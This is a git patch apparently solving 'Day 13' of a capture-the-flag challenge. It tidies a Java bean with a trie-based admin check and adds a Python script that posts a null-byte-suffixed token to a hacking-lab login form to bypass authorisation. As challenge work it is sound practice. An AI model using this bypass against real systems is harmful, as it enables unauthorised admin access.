From 97efd59a23fa0be3b64d9d09fbf4a06398004f68 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder <roman.hergenreder@ilume.de>
Date: Fri, 13 Dec 2019 21:33:46 +0100
Subject: [PATCH] Day 13 solved

---
 Day 13/NotesBean.java | 26 ++++++++++++++------------
 Day 13/exploit.py     | 34 ++++++++++++++++++++++++++++++++++
 2 files changed, 48 insertions(+), 12 deletions(-)
 create mode 100644 Day 13/exploit.py

diff --git a/Day 13/NotesBean.java b/Day 13/NotesBean.java
index a08e836..b6e678f 100644
--- a/Day 13/NotesBean.java	
+++ b/Day 13/NotesBean.java	
@@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils;
 public class NotesBean implements Serializable {
 
 	/**
-	 *
+	 * 
 	 */
 	private PatriciaTrie<Integer> trie = init();
 	private static final long serialVersionUID = 1L;
@@ -42,18 +42,20 @@ public class NotesBean implements Serializable {
 	public void setTrie(String note) {
 		trie.put(unescapeJava(note), 0);
 	}
+		
+    private static PatriciaTrie<Integer> init(){
+        PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
+        trie.put(securitytoken,0);
 
-  private static PatriciaTrie<Integer> init(){
-    PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
-    trie.put(securitytoken,0);
-    return trie;
-  }
+        return trie;
+    }
 
-  private static boolean isAdmin(PatriciaTrie<Integer> trie){
-    return !trie.containsKey(securitytoken);
-  }
+    private static boolean isAdmin(PatriciaTrie<Integer> trie){
+        return !trie.containsKey(securitytoken);
+    }
+
+    private static InputStream getStreamFromResourcesFolder(String filePath) {
+    	  return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
+    	 }
 
-  private static InputStream getStreamFromResourcesFolder(String filePath) {
-  	return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
-  }
 }
diff --git a/Day 13/exploit.py b/Day 13/exploit.py
new file mode 100644
index 0000000..53a5695
--- /dev/null
+++ b/Day 13/exploit.py	
@@ -0,0 +1,34 @@
+#!/usr/bin/python
+
+import requests
+from bs4 import BeautifulSoup as bs
+
+URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
+
+session = requests.session()
+
+# Get view state
+response = session.get(URL)
+if response.status_code != 200:
+    print("Server returned %d %s" % (response.status_code, response.reason))
+    exit(1)
+
+html = bs(response.text, 'lxml')
+viewState = html.find("input", { "id": "javax.faces.ViewState" })
+if viewState is None:
+    print("Could not find javax.faces.ViewState")
+    exit(2)
+
+params = {
+    "j_idt14": "j_idt14",
+    "j_idt14:j_idt15": "login",
+    "j_idt14:name": "auth_token_4835989\0",
+    "javax.faces.ViewState": viewState['value']
+}
+
+response = session.post(URL, data=params)
+if response.status_code != 200:
+    print("Server returned %d %s" % (response.status_code, response.reason))
+    exit(1)
+
+print(response.text)